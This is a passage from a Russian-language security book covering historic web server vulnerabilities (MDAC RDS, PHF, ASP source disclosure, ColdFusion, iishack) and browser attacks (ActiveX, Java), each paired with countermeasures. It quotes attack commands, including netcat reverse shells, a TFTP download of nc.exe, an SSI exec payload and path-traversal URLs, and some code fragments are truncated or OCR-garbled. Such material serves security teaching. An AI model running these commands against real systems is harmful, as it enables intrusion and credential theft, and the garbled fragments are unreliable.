SiteScan Программа' SiteScan, написанная Хамелеоном (Chameleon) из групп Rhino9 и InterCore, позволяет выполнить более глубокое исследование, чем Grinder, проверяя наличие таких определенных изъянов, как PHF, PHP, finger, test.cgi и другие. Это графическое приложение Win32 за один раз может исследовать только один IP-адрес, поэтому ее нельзя включать в сценарии. Придется каждый раз вручную вводить IP-адрес и просматривать полученный результат. |
Несоответствие сценариев требованиям безопасности: взлом при отсутствии проверки ввода Причиной взлома при отсутствии проверки ввода с использованием общего интерфейса шлюза (CGI — Common Gateway Interface), активных страниц сервера (ASP — Active Server Pages) и языка разметки CFML (Cold Fusion Markup Language), является промах либо разработчика, либо поставщика программного обеспечения. Основная проблема возникает из-за недостаточной обработки входных данных некоторого сценария. Если не позаботиться о проверке достоверности и последующей очистке входных данных, взломщик сможет передать сценарию нужный символ, скажем, локальную команду, в качестве параметра и таким образом локально запустить эту команду на Web-сервере. Изъян MDAC RDS IIS 4.0 Вскоре после того, как компания Microsoft справилась с проблемой, вызванной программой iishack, работа которой приводила к переполнению буфера сервера IIS (это произошло в июне 1999 года), в июле ей пришлось столкнуться с другой проблемой, связанной с Web-сервером. Данная проблема была описана в бюллетене компании Microsoft, посвященном вопросам безопасности, еще в 1998 году, но стала известна широкой общественности лишь в последнее время. Этот изъян возникает из-за недостатка одного из компонентов Microsoft доступа к данным (MDAC — Microsoft Data Access Components) службы RDS (Remote Data Service), который позволяет взломщику запускать любые команды на уязвимом сервере. #!/usr/bin/perl При использовании параметра -n команды netcat требуется, чтобы в командной строке явно указывался IP-адрес "Анатомия" атаки Сценарий Perl можно найти на многих Web-узлах, в том числе в архиве NTBugtraq (http://www.ntbugtraq.com) или на узле компании Security Focus (http://www.securityfocus.com). Он работает одинаково эффективно как в системе UNIX, так и в NT, и предпринимает попытку установить связь с компонентами MDAC, чтобы добавить в запрос SQL строку | shell ($command) |. Когда компонент MDAC достигает команды shell, выполняется команда, заданная в переменной $ command. Для того чтобы убедиться в наличии описанной возможности, попробуйте запустить команду со следующим синтаксисом. C:\>perl mdac_exploit.pl -h 192.168.50.11 Разработка корректной команды для системы NT — непростая задача. Сомил Шах (Somil Shah) и Нитеш Даньяни (Nitesh Dhanjani) вместе с Джорджем Куртцом (George Kurtz) разработали интересную последовательность команд, которые можно загрузить с помощью TFTP или по FTP. В результате будет загружена и запущена утилита netcat, возвращающая обратно командную оболочку системы NT (cmd.exe). Например, с использованием средств FTP можно воспользоваться следующей последовательностью команд, "cd SystemRoot £& echo $ftp_user>ftptmp При использовании TFTP аналогичные команды будут выглядеть следующим образом, "cd\%SystemRoot\% Применение этих команд в сценарии Perl позволит вернуть командную оболочку удаленной системы, с помощью которой можно будет загрузить любое количество файлов, включая утилиту pwdump.exe (позволяющую получить хэш-коды из базы данных SAM), а затем приступить к взлому с применением утилит L0phtcrack или John vl.6. Если команда оказалась неработоспособной, то, не исключено, что на пути к порту TCP (FTP) с номером 21 или порту UDP (TFTP, 69) целевой системы находится маршрутизатор или брандмауэр. Контрмеры: защита компонентов МDАС службы RDS Для того чтобы предотвратить такие атаки, либо удалите все файлы, используемые в этом случае, либо измените конфигурационные параметры сервера. Изъяны CGI По-видимому, после переполнения буфера плохо написанные сценарии CGI являются наиболее опасными изъянами в Internet. В электронном мире еще можно найти Web-серверы, разработчики которых экономили время на программировании, а после того, как взломщик пробрался на сервер и навел там свои порядки, пожалели о своей спешке. В этом разделе описано несколько наиболее популярных изъянов сценариев CGI, а также последствия, к которым приводит их использование. Сценарии PHF Возможно, одним из наиболее старых и в наши дни редко встречающихся изъянов является сценарий PHF, который изначально применялся на серверах HTTPD центра NCSA (версия 1.5А-Export или более ранние) и сервера Apache (версии 1.0.3). Эта программа CGI является примером сценария, обеспечивающего интерфейс в виде форм, который можно использовать для поиска имен и адресов в адресной книге. Из-за того что в этом сценарии для проверки входных данных используется функция escape_shell_cmd(), он оказывается уязвимым для широко распространенной атаки, при которой обманным путем удается локально запускать команды. Символ новой строки (0х0а в шестнадцатеричной системе счисления) не проверяется при контроле правильности входных данных. Поэтому он может быть использован для прерывания выполнения сценария и запуска любой команды, указанной после этого символа, в локальном контексте Web-сервера. Например, введение следующего адреса URL приведет к извлечению файла паролей, если пользователь, запустивший Web-сервер, обладает правами доступа к этому файлу. Контрмеры: защита сценариев РНР Предотвращение Лучше всего удалите этот сценарий с Web-сервера. Скорее всего, на рабочем сервере такой сценарий не требуется. Обнаружение Средства обнаружения атак, направленных на использование изъяна PHF, встроены почти в каждую бесплатную или коммерческую систему выявления вторжений, так что в этом случае решить проблему безопасности будет несложно. С помощью программы phfprobe.pl можно привлечь взломщиков к своему Web-узлу и зафиксировать выполняемые ими действия. В процессе анализа полученных данных можно лучше продумать стратегию защиты. Данная программа Perl служит в качестве приманки, имитирующей сценарий PHF. Она отправляет взломщикам такие ответные сообщения, как будто предпринимаемые ими действия выполняются успешно. На самом же деле осуществляется сбор информации о взломщиках и их тактике. Эту ловушку следует применять только при полной уверенности в надежности системы.
Изъяны CGI системы Irix Первое сообщение об изъяне CGI системы Irix появилось в 1997 году в бюллетене Bugtraq. Новость опубликовал Разван Драгомиреску (Razvan Dragomirescu). Он обнаружил, что в состав подсистемы Outbox Environment многих систем Irix входит несколько программ, уязвимых для взлома при отсутствии проверки ввода. Сценарий webdist.cgi, а также сценарии-оболочки систем Irix 5.x и 6.x позволяют взломщикам передавать локальные команды и запускать их на удаленном узле. Контрмеры против использования изъянов CGI систем Irix Как и раньше, если сценарий не применяется, лучше всего удалить его из системы и тем самым предотвратить возможность использования его изъянов. Если же удалить сценарий невозможно, воспользуйтесь модулем обновления SGI, который можно найти по адресу http://www.sgi.com/support/patch_intro.html. test-cgi Впервые об этом изъяне широкой общественности сообщила группа L0pht в 1996 году. С его использованием взломщик может удаленно получать информацию о файлах, которые имеются на целевом узле. Например, используя следующий URL, взломщик может просмотреть список всех файлов и каталогов, которые содержатся в каталоге сценариев (egi -bin). http://192.168.51.101/cgi-bin/test-cgi?* В результате на экран будет выведено значение переменной окружения QUERY_STRING. QUERY_STRING = count.cgi createuser.pl nph-test-cgi phf php.cgi Конечно же, получение перечня имеющихся в системе сценариев поможет взломщику найти другие слабые места, через которые можно будет получить доступ к Web-серверу, например PHF, PHP и т.д. Эта информация откроет взломщику доступ к удаленному узлу с правами пользователя или даже суперпользователя, а впоследствии он добьется контроля над всей системой UNIX. Контрмеры против использования изъянов ССI Если обычное решение проблемы (удаление сценария) по каким-либо причинам реализовать нельзя, стоит обратиться к некоторым ресурсам Internet, в которых можно найти советы по безопасному написанию сценариев. |
Уязвимость активных страниц сервера Активные страницы сервера (ASP — Active Server Pages) представляют собой разработку компании Microsoft, аналогичную сценариям Perl и интерфейсу CG1 системы UNIX. Обычно написанный на языке VBScript, код ASP выполняет многое из того, что необходимо для поддержки состояния, обеспечения доступа к серверной части базы данных и отображения кода HTML в окне броузера. Одной из приятных особенностей страниц ASP является то, что они могут "на лету" генерировать страницы HTML. Другой малоприятной особенностью являются многочисленные изъяны страниц ASP, позволяющие взломщику просматривать их исходный код. Почему это плохо? Во-первых, потому, что взломщик, изучая логику программы, может обнаружить и другие изъяны. Во-вторых, он может найти в этих файлах такую важную информацию, как база данных имен и паролей пользователей. Ошибка ASP, связанная с интерпретацией точки Один из членов группы LOpht в 1997 году обнаружил ошибку, которая возникает, если одну или несколько точек поставить после адреса URL страницы ASP сервера IIS 3.0. При этом можно просмотреть исходный код ASP и проанализировать логику этой программы. Еще важнее то, что в данном файле можно найти такую важную информацию, как имена и пароли пользователей. Чтобы воспользоваться этой возможностью, нужно просто добавить точку после URL. Контрмеры Хорошая новость заключается в том, что компания Microsoft выпустила модуль обновления для сервера IIS 3.0. Уязвимость ASP, связанная с альтернативными потоками данных Впервые об этом изъяне в бюллетене Bugtraq сообщил Пауль Эштон (Paul Ashton). В данном случае также можно загрузить исходный код страниц ASP. Этой возможностью легко воспользоваться, поэтому она стала довольно популярна среди новичков. Просто задайте URL в следующем формате. Контрмеры Для усиления защиты ограничьте доступ ко всем исходным файлам, отменив право на чтение для группы Everyone. В конце концов, для исходного код вполне достаточно разрешения на выполнение. Изъяны showcode. asp и codebrws. asp Рассмотрим еще один изъян, имеющий отношение к IIS 4.0, который связан с возможностью просмотра исходного кода ASP. Его отличие от рассмотренных выше ошибок заключается в том. что сам по себе этот изъян не является ошибкой, а представляет собой пример плохого программирования. Если в процессе установки сервера IIS 4.0 будут скопированы также файлы с примерами исходного кода ASP, то несколько плохо написанных файлов позволят взломщику загрузить на свой компьютер другие файлы. Проблема заключается в неспособности сценариев обрабатывать символы .., содержащиеся в пути к файлу. В следующем примере использование файла showcode.asp приведет к отображению файла boot.ini взламываемой системы (если доступ ограничен незначительно, то просмотреть можно любой файл). http: //192.168. 51.101/msadc/Samples/ Точно так же, посредством файла codebrws.asp можно просмотреть любой файл, который находится на локальном диске. Как упоминалось в главе 13, можно попытаться найти файлы с расширением GIF программы pcAnywhere. http://192.168.51.101/iissamples/exair/howitworks/ Изъяны showcode.asp и codebrws.asp невозможно использовать для корректной загрузки с целевого узла двоичных файлов. Причина заключается в том, что сценарий ASP обычно преобразовывает файлы. Преобразование такого файла, как SAM._, приведет к его повреждению и сделает его непригодным для использования. Однако это не помешает умелому хакеру восстановить структуру файла SAM и воспользоваться полученной информацией.
Контрмеры против использования изъянов в файлах АSР Рассмотренные выше проблемы можно решить, установив модуль обновления сервера IIS. Этот модуль, а также статью Q232449 из базы знаний компании Microsoft, можно найти по адресу ftp://ftp.microsoft.com/ bussys/IIS/iis-public/ fixes/usa/Viewcode-fix/. Изъян webhits.dll Ряд проблем, связанных с возможностью просмотра файлов, был выявлен группой CIS (Cerberus Information Security). Эти изъяны связаны с приложением ISAPI webhits.dll. Эта динамически подключаемая библиотека реализует механизм выделения информации в процессе функционирования MS Index Server. Однако ее наличие делает возможным взлом, при котором злоумышленник просматривает важные исходные коды ASP или другую информацию, содержащуюся на локальном диске. Первая из возможных атак начинается с использования существующего файла . HTW для просмотра исходного кода. http://192.168.51.101/default.asp%20%20%20%20%20%20%20% Третья .HTW-атака основана на использовании имени файла null.htw для помещения в окно броузера необработанного файла: http://192.168.51.10I/null.htw?CiWebHitsFile=/../../../../../winnt/ Использование предыдущего адреса URL приведет к тому, что сервер IIS предоставит файл /winnt/repair/setup.log. Контрмеры против использования изъянов библиотеки webhits.dll Для предотвращения использования рассмотренных атак удалите приложения, связанные с файлами с расширением . HTW. Для этого откройте диалоговое окно с основными свойствами уязвимого сервера, а затем для службы WWW Service щелкните на кнопке Edit. Далее перейдите во вкладку Home Directory и щелкните на кнопке Configuration из группы Application Settings. При этом на экране появится следующее диалоговое окно. Затем выделите строку, в которой указано приложение, связанное с файлами . HTW, и щелкните на кнопке Remove. После этого Web-сервер больше не будет обращаться к библиотеке webhits .dll, и, таким образом, этот изъян будет устранен.
Изъяны сервера ColdFusion Специалистами группы LOpht было обнаружено несколько существенных изъянов в сервере приложений Cold Fusion, позволяющих осуществлять удаленный запуск команд на уязвимом Web-сервере. В процессе установки этого программного продукта вместе с ним копируются также примеры кода и интерактивная документация. Причиной обнаруженных изъянов послужили несколько примеров, взаимодействие которых не ограничивается только локальным узлом. systemC'tftp -i 192.168.51.100 GET nc.exe"); Этот метод сработает в том случае, если на сервере Cold Fusion установлен интерпретатор языка Perl. http://192.168.51.101/cfdocs/expeval/openfile.cfm 3. Укажите в поле Open File путь к созданному файлу и щелкните на кнопке ОК. 4. В адресе URL замените строку D:\INETPUB\WWWROOT\cfdocs\expeval\test.pl на полное имя файла exprcalc.cfm (с указанием пути), предназначенного для удаления загруженных в систему файлов. После внесения изменений URL должен выглядеть следующим образом. http://192.168.51.101/cfdoce/expeval/ExprCalc.cfra?RequestTimeout= 5. В окне должно появиться содержимое файла exprcalc. cfm и он должен быть удален из системы. После этого все файлы, загруженные с помощью openfile.cfm, будут оставаться в удаленной системе. С:\>пс -1 -р 3000
Контрмеры против использования изъянов сервера Cold Fusion Для того чтобы предотвратить возможность использования изъянов Cold Fusion, можно воспользоваться двумя способами:
|
Переполнение буфера Многие годы проблемы, связанные с переполнением буфера, были серьезным недостатком системы защиты системы UNIX. После появления в 1995 году статьи How to write buffer overflow в мире UNIX многое переменилось. В классической статье Алефа Вана (Aleph One) Smashing the stack for fun and profit, впервые опубликованной в журнале Phrack Magazine в 1996 году, подробно описано, насколько просто добиться переполнения буфера. Изъян РНР В сценариях РНР имеется два (а возможно и больше) изъянов. Один из них является обычной проблемой отсутствия проверки ввода, ставшей бедствием для многих разрабатываемых ранее сценариев. С использованием этого изъяна взломщики могли просмотреть любой файл целевой системы. Контрмеры против использования изъяновРНР Обеспечить защиту можно двумя способами:
Изъян wwwcount.cgi Программа wwwcount является популярным счетчиком Web. Впервые о ее изъяне и его применении стало известно в 1997 году. Этот изъян позволяет взломщик)' удаленно выполнять любой код на локальной системе. Широкой общественности по крайней мере стало известны два примера использования этого изъяна, однако в обоих случаях происходило в основном одно и то же: "захват" взломщиком окна xterm. Контрмеры против использования nsbflHawwwcount Предотвратить использование изъяна программы wwwcount можно двумя способами:
Изъян iishack сервера IIS 4.0 В июне 1999 года широкой общественности стало известно о досадной ошибке в системе защиты сервера IIS 4.0, которая оказалась серьезной угрозой безопасности Web-сервера компании Microsoft. Этот изъян был обнаружен группой экспертов по вопросам безопасности еЕуе, которая поместила в Internet исходный код и исполняемый файл, с помощью которого можно осуществить взлом. Источником проблемы является недостаточная проверка границ имен файлов .НТК, .STM и .юс, содержащихся в адресах URL. Это позволяет взломщику поместить в этот адрес код, который будет загружен на целевую систему и выполнен с правами администратора. C:\nt\>iishack 10.12.24.2 80 172.29.11.101/getem.exe Созданная авторами простая программа типа "троянский конь" getem.exe, распаковывает утилиту pwdump.exe (позволяющую получить дамп хеш-кодов базы данных SAM), запускает утилиту netcat, настроенную на прослушивание порта 25, и возвращает обратно командную оболочку (nc -nw -L -р 25 -t -e cmd.exe). После успешного выполнения всех этих действий на собственном компьютере можно запустить утилиту netcat, получив таким образом в свое распоряжение командную оболочку и локальный доступ с привилегиями учетной записи SYSTEM (т.е. с правами администратора): C:\>nc -nw 10.11.1.1 26 С помощью простых команд копирования и вставки, применяемых в командной строке, а также программы LOphtCrack, которая используется для взлома хеш-кодов, можно получить в свое распоряжение пароль администратора (и любого другого пользователя системы). Контрмеры против изъянов US 4.0 Сначала компания Microsoft разработала комплекс рекомендаций для устранения этой проблемы, а затем выпустила модуль обновления. Группа экспертов eEye выпустила свой собственный модуль обновления, однако всегда рекомендуется использовать средства от производителя. Изъян переполнения полей У читателя может возникнуть вопрос, "Действительно ли можно взломать Web-сервер, пользуясь только Web-броузером?" На этот вопрос можно ответить вполне определенно: "ДА". Программисты в Web в первую очередь заботятся о производительности, отодвигая вопросы безопасности на второй план. Лучше всего это видно на примере ошибки, возникающей при переполнении буфера на сервере Cold Fusion, которая была обнаружена группой Foundstone. Проблема заключается в том, каким образом компания Allaire реализовала проверку достоверности входных данных, которые вводятся в поле пароля администратора. Пользуясь недостаточно полной очисткой этого поля, взломщик с помощью одного броузера может практически полностью вывести Web-сервер из строя. Вот как это можно сделать. 1. Введите в броузере адрес страницы регистрации администратора в системе на типичном сервере Cold Fusion: <form 4. Измените дескриптор HTML с именем PasswordProvided, который содержит пароль, а затем измените свойства size и MAXLENGTH: <input Name="PasswordProvided" 5. Щелкните на кнопке Preview, расположенной на панели инструментов Netscape, и сохраните этот файл в формате HTML.
На приведенном рисунке можно увидеть, что выполненные выше действия привели к подъему использования процессора сервера до 100%. Если подобные запросы продолжают поступать то, в конце концов, произойдет переполнение памяти. Более того, если на сервер отправить больше миллиарда символов, это окончательно выведет его из строя. В любом случае, для выяснения причины сбоя придется перезагружать систему.
Контрмеры Единственным эффективным решением проблемы подобного рода является использование в каждой разрабатываемой программе процедуры очистки входных данных. В рассмотренном случае можно переместить страницу администратора в какой-то другой каталог или выполнить рекомендации по обеспечению безопасности сервера Cold Fusion, которые можно найти по адресу http://www.allaire.com/Handlers/index. cfm?ID=10954&Method=Full. |
Плохое проектирование в Web Хотя в истории развития Internet имеются многочисленные примеры разрушительных атак на Web-серверы, которые позволяют взломщикам получать важную информацию об устройстве сервера, а зачастую и привилегированные права доступа, эти взломы — только вершина айсберга. Многие разработчики не стремятся изучить жизненно важные методы проектирования, которые могли бы ограничить нежелательное использование их Web-серверов. В развитие многих из методов, обсуждаемых в этой главе, внесли вклад многие люди, в том числе Симпл Номад (Simple Nomad) из центра NMRCи компания Perfecto Inc. Использование скрытых дескрипторов В настоящее время многие компании пользуются Internet, предлагая свои продукты и услуги любому, у кого есть Web-броузер. Но "плохо запрограммированная" тележка для покупок может позволить взломщику фальсифицировать стоимость товаров. Например, рассмотрим небольшую компанию, занимающуюся продажей аппаратного обеспечения. Эта компания обзавелась собственным Web-сервером, чтобы ее клиенты могли осуществлять покупки в интерактивном режиме. Однако они допустили в программе важный промах: применили скрытые дескрипторы HTML как единственный механизм назначения цены за определенный товар. В результате, если взломщики обнаружат это уязвимое место, они смогут изменить цену, стоящую в скрытых дескрипторах, по своему усмотрению. <FORM ACTION="http://192.168.51.101/cgi-bin/order.pi" В этом случае простое изменение цены с помощью Netscape Composer или в любом текстовом редакторе позволит взломщику заплатить за товар $1.99 вместо предполагаемой суммы $199.99: Контрмеры против использования скрытых дескрипторов Чтобы предотвратить возможность использования взломщиками скрытых дескрипторов HTML, ограничьте их использование в коде, который обеспечивает хранение такой важной информации как цены, или, по крайней мере, реализуйте режим подтверждения этих значений перед их использованием. Вставки SSI Механизм SSI (Server Side Includes) обеспечивает интерактивную работу в режиме реального времени без использования программирования. Разработчики Web-приложений часто используют эту возможность для быстрого получения системной даты/времени или для запуска локальной команды и обработки выходных данных. Возможности таких вставок реализуются с помощью дескрипторов (tag). В число дескрипторов входят: echo, include, fsize, flastmod, exec, config, odbc, email, if, goto, label, и break. Три из них, include, exec и email, могут оказаться наиболее полезны взломщикам. <!--#ехес cmd="/usr/XHR6/bin/xterm -display attacker:0 &"-->
Меры предосторожности против использования SSI Нужно пользоваться сценарием, проводящим предварительный синтаксический анализ любого прочитанного файла HTML, и отбрасывающим любую несанкционированную строку SSI перед передачей этого файла серверу для обработки. Добавления к файлам Любая возможность Web-приложений, позволяющая пользователю вводить информацию в файл непосредственно повышает уязвимость системы и создает потенциальную возможность атаки. Например, если на Web-узле содержится форма для ввода рекомендаций по улучшению работы узла, или что-то другое в том же духе, и пользователи имеют возможность просматривать этот файл, то взломщик может воспользоваться этим обстоятельством. Используя код SSI (описанным выше способом), он может поместить в файл с комментариями код, который запускается локально, или код JavaScript, предлагающий ввести входящим пользователям их имя и пароль, чтобы использовать эту информацию в будущем. Контрмеры против использования добавлений к файлам Нужно ограничить возможность использования добавлений в процессе совместного интерактивного использования информации, так как эти возможности открывают взломщику слишком много путей манипулирования пользователями и Web-сервером. |
Резюме В этой главе обсуждаются распространенные и не очень известные проблемы, обнаруженные в Internet. У взломщиков на вооружении имеется определенный набор способов, к которым они могут прибегнуть, пытаясь получить доступ к Web-серверу, или хотя бы обмануть его. При этом они могут пользоваться изъянами проверки входных данных, условиями переполнения буфера или обычными промахами, допущенными при разработке Web-приложений. |
Глава 16. АТАКИ НА ПОЛЬЗОВАТЕЛЕЙ INTERNET
|
Атаки на пользователей INTERNET До сих пор много говорилось об общепринятых методах взлома систем, принадлежащих различным компаниям и управляемых опытными администраторами. Ведь считается, что именно там находятся основные ценности, не так ли? Не может же зловредный хакер пытаться найти что-нибудь интересное на домашнем компьютере какой-нибудь старушки. |
Мобильный код со злым умыслом Появление мобильного кода стало важным событием в процессе развития Internet от статического набора документов до случайным образом генерируемой среды, которой она стала на сегодняшний день. Развитие современных технологий, основанных на динамических данных, может стать основной моделью обработки информации в будущем. Однако сейчас акцент делается не на повышении надежности клиентских вычислительных моделей, а на расширении использования динамических документов HTML (DHTML), таблиц стилей и повышении производительности сценариев серверных приложений. (Правда, на это можно возразить, что сама обработка данных происходит все же на клиентском компьютере, однако подобный спор требует углубления в архитектуру самого Web-броузера.) В любом случае мобильный код, передающийся по сети на узел назначения, на сегодняшний день остается важнейшей частью фундамента Internet. Механизмы поддержки двух доминирующих парадигм мобильного кода, язык Java компании Sun и элементы управления ActiveX компании Microsoft, встроены во все броузеры. Поэтому их изучение является крайне важным для обеспечения безопасности любого клиента Internet. |
Элементы ActiveX компании Microsoft Элементы управления ActiveX являются результатом повторной попытки фирмы Microsoft разработать модель мобильного кода. Их часто описывают как приспособленную для Web технологию создания документов со связыванием и внедрением объектов (Object Linking and Embedding — OLE). На самом деле это сильно упрощенная трактовка набора интерфейсов, спецификаций и претендующих на исключительность парадигм разработки, входящих в модель СОМ компании Microsoft (COM — Component Object Model), которая и составляет основу технологии ActiveX. В то же время подобные упрощения способствуют лучшему пониманию. Приложения ActiveX могут создаваться для выполнения определенных задач (таких как воспроизведение видео-или звукового файла). Их можно поместить на Web-страницу, и тогда эти программы будут выполнять свои функции при ее просмотре точно так же, как технология OLE поддерживает операцию вставки электронных таблиц Excel в документы Word. Флаг "Safe for scripting" технологии ActiveX Летом 1999 года Георгий Гунински (Georgi Guninski) и Ричард М. Смит (Richard М. Smith) (и не только они) независимо обнаружили два различных изъяна в методе обработки элементов ActiveX броузером Internet Explorer. Установив для элементов управления флаг "safe for scripting" ("помеченный как безопасный"), их разработчики могут полностью обойти обычную процедуру проверки сертификатов Authenticode. В качестве примеров таких элементов ActiveX можно привести Scriptlet. typelib и Eyedog.OCX, предназначенные для использования в IE4 и более ранних версиях. Если для этих элементов управления установлен флаг "safe for scripting", то при их запуске в броузере на экран не будет выводиться никаких сообщений. <object id="scr" Этот изъян интерфейсов программного обеспечения, позволяющий получить к ним доступ, Ричард М. Смит (Richard M. Smith) назвал "случайным троянским конем". Установленные на жесткий диск многих пользователей вместе с таким популярными приложениями, как IE, данные элементы управления ActiveX ожидают, пока кто-нибудь не установит с ними удаленное соединение (http: //www. tiac.net/users /smiths/acetroj/index.htm). Чтобы посмотреть, имеются ли среди этих объектов помеченные как "safe for scripting", воспользуйтесь утилитой oleview из набора NT Resource Kit (ее более новая версия входит в среду разработки приложений Visual Studio компании Microsoft). Утилита oleview позволяет просмотреть все зарегистрированные в системе объекты COM/ActiveX. Кроме того, она выводит их идентификатор класса (CLSID — Class ID), используемый при обращении к этим объектам в системном реестре, и многие важные параметры из поддерева Implemented Categories системного реестра. function setup() { ua.ShowDialog(ОхОЕ2В); Элементы управления, помеченные как "safe for scripting", могут вызываться также из электронных сообщений в формате HTML. В этом случае их гораздо легче разместить в нужном месте, поэтому они могут быть более опасны. Подобные "бомбы" обсуждаются в следующих разделах, посвященных хакингу через электронную почту.
Защита от использования флага "safe for scripting" Для защиты от этих серьезных изъянов пользователям Internet можно предложить три метода. Мы рекомендуем воспользоваться всеми тремя способами. После инстанцирования элементы управления ActiveX остаются в памяти до тех пор, пока не будут выгружены. Для этого в командной строке введите команду regsvr32 /u [Имя_элемента].
Активная загрузка файлов Независимый исследователь проблем безопасности Хуан Карлос Гарсия Квартанго (Juan Carlos Garci'a Cuartango), внимание которого особенно привлекает броузер Internet Explorer, поместил на своем Web-узле информационное сообщение об одном из его изъянов. Это оказалось настолько важным, что сообшение было переведено на английский язык (тогда как остальная информация узла была представлена на испанском). Суть изъяна заключается в возможности генерирования состояния отказа в обслуживании (DoS — Denial of Service), если для загрузки файлов с расширением .CAB, имеющих сертификат компании Microsoft, используется элемент управления ActiveX. При этом файлы загружаются в любое указанное место диска, даже если для этого необходимо записать их поверх других файлов. Контрмеры Компания Microsoft выпустила соответствующий модуль обновления, который можно найти по адресу http://www.microsoft.com/security (Bulletin MS00-42). В системе Windows 2000 защиту определенных системных файлов от перезаписи обеспечивает служба WFP (Windows File Protection). Разумное использование зон безопасности: общее решение проблемы элементов ActiveX Одной из лучших ссылок по этой теме является статья Q174360 из базы знаний компании Microsoft (http://support.microsoft.com). Там вы найдете много ценной информации о зонах безопасности. По существу, модель зон безопасности позволяет определять разные уровни доверия для кода, загружаемого с одной из четырех зон: Local Intranet (Местная зона (интрасеть)), Trusted Sites (Зона надежных узлов), Internet (Зона Internet) и Restricted Sites (Зона ограниченных узлов). Существует еще пятая зона, которая называется Local Machine (Локальная машина), однако в пользовательском интерфейсе она недоступна, настроить ее можно только с помощью средств администрирования IEAK (IE Administration Kit) Таблица 16.1. Рекомендуемые параметры безопасности зоны Internet( настройки уровня Custom Level нужно выполнять после того, как по умолчанию задан уровень безопасности High)
Параметры, позволяющие запретить использование элементов управления ActiveX, показаны на рис. 16.1.
Если вы все же хотите воспользоваться преимуществами звуковых и анимационных эффектов, обеспечиваемых элементами Shockwave, придется допустить использование элементов ActiveX (конечно, если не задействован броузер Netscape, в котором элементы Shockwave выступают в качестве подключаемых модулей). Другим ориентированным на элементы ActiveX узлом, который посещается многими пользователями, является узел Windows Update компании Microsoft (WU), на котором элементы ActiveX используются для сканирования компьютера пользователя, а также для загрузки и установки нужных модулей дополнения. Этот Web-узел оказался удачной идеей. Он позволяет сэкономить огромное количество времени, требуемого для поисков отдельных модулей обновления (что особенно важно для обеспечения безопасности!), и автоматически определить, была ли ранее установлена правильная версия. Однако мы не думаем, что из-за одного узла, предоставляющего такие удобства, стоит полностью разрешать использование элементов управления ActiveX. Еще хуже то, что после запрещения использования элементов ActiveX в броузере Internet Explorer нельзя воспользоваться механизмом автоматического поиска адреса по фрагменту URL, введенному в адресной строке (например, когда по подстроке mрЗ требуется найти узел http: //www.mp3. com). Соблюдайте осторожность и добавляйте в зону надежных узлов только те из них, которые пользуются высокой степенью доверия, поскольку к ним будет применяться меньше ограничений, связанных с загрузкой их активного содержимого и запуском. Следует иметь в виду, что даже респектабельный Web-узел может быть взломан хакерами-злоумышленниками, или в группе его разработчиков может оказаться негодяй, охотящийся за данными пользователей (а возможны и худшие варианты). Для безопасного чтения электронных сообщений приложения Outlook и Outlook Express можно настроить так, чтобы в них тоже учитывались зоны безопасности. Параметры Outlook и Outlook Express позволяют выбрать зону, уровень безопасности которой будет использоваться при обработке содержимого, отображаемого почтовой программой. Имеется две возможности: Internet и Restricted Sites. Конечно же, рекомендуется выбрать зону ограниченных узлов (новый модуль Outlook 2000 Security Update выполняет эту установку самостоятельно). Убедитесь в том, что в параметрах зоны Restricted Sites полностью отключены все категории активного содержимого! Для этого установите уровень безопасности High, а затем задайте режим Custom Level и отключите все режимы, которые остались включенными (если их отключить нельзя, установите переключатель в положение, соответствующее наивысшему уровню безопасности). Процесс настройки зоны Restricted Sites в Outlook показан на рис. 16.2Д
Изъяны в системе защиты Java В 1990 году компания Sun Microsystems решила создать парадигму программирования, которая помогла бы решить многие проблемы разработки программ, стоящие перед их создателями еще со времен зарождения вычислительной техники. В результате одним выстрелом удалось убить двух зайцев: создать новый язык Java и попутно решить многие традиционные проблемы обеспечения безопасности. Большинство людей полагают, что язык Java безопасен на все 100%, поскольку с самого начала был задуман как нечто исключительное. Это мнение в значительной мере подкрепляется маркетинговой политикой компании Sun. Конечно же, обеспечить абсолютную безопасность невозможно. Однако пути ее повышения, применяемые в Java, несомненно, представляют определенный интерес. (Ниже будет рассмотрена архитектура Java 2, или JDK 1.2, которая в момент написания книги являлась текущей.) Ошибки JVM броузера Netscape Communicator В апреле 1999 года сотрудник Марбургского университета (Германия) Карстен Зор (Karsten Sohr) обнаружил изъян важного компонента безопасности JVM броузера Netscape Communicator. При определенных обстоятельствах виртуальная машина Java не проверяет загружаемый в нее код. Использование этого изъяна позволяет взломщику запустить код, разрушающий механизмы проверки типов Java, и реализовать взлом со смешением типов (type confusion attack). Это классический пример отступления реализации от первоначального замысла. Отключение Java в броузере Netscape Обновите текущую версию Netscape, или отключите Java, выполнив следующие действия (рис. 16.3).
Изъян в механизме обеспечения безопасности Microsoft Java В броузере Internet Explorer вскоре была обнаружена аналогичная ошибка. Из-за недостатков реализации механизма обеспечения безопасности в JVM компании Microsoft появилась возможность полностью обойти механизмы защиты с помощью хитро запрограммированного аплета, размещенного на удаленном Web-сервере, или встроенного в сообщение электронной почты в формате HTML. Устранение ошибок в Internet Explorer Чтобы узнать, уязвима ли используемая вами версия программы, введите в командной строке команду jview. Найдите номер сборки (последние четыре цифры номера версии) и определите, к какой из следующих категорий он относится.
Не удивляйтесь, если после выполнения команды jview окажется, что изъян существует, даже если Internet Explorer не установлен. Некоторые другие продукты компании Microsoft, такие как Visual Studio, тоже устанавливают виртуальную машину Java. Во время написания этого раздела немало был удивлен и автор, когда выяснил, что у него на компьютере тоже установлена версия JVM с изъяном. Она была установлена вместе с IE 5.0 через год с момента выпуска модуля обновления! Brown Orifice и новые ошибки в Java Летом 2000 года Дан Брумлев (Dan Brumleve) сообщил о двух выявленных изъянах. относящихся к реализации Java в Netscape Communicator. В частности, он установил, что в некоторых файлах библиотек классов Java при выполнении определенных операций не выполняется надлежащая проверка безопасности или результаты этой проверки игнорируются. В число классов, о которых идет речь, входит класс java.net. ServerSocket, используемый для создания прослушиваемых сетевых сокетов для входящих сетевых соединений, а также классы netscape, net. URLConnection и netscape.net.URLlnputSteam, содержащие абстрактные стандартные методы чтения локальных файлов. Во всех этих трех классах содержатся методы, в которых некорректно вызывается метод SecurityManager .check, определяющий, действительно ли данный аплет обладает правами доступа, необходимыми для выполнения некоторых действий. Если проверка завершилась неудачей, то это исключение игнорируется. Контрмеры против Brown Orifice Как обычно, единственный надежный способ защиты от опасных аплетов заключается в запрете использования Java в Web-броузере. Сделать это можно в броузере Netscape, как описано выше в разделе "Отключение Java В Броузере Netscape" и показано на рис. 16.3. Мы рекомендуем использовать эти параметры пользователям Netscape. |
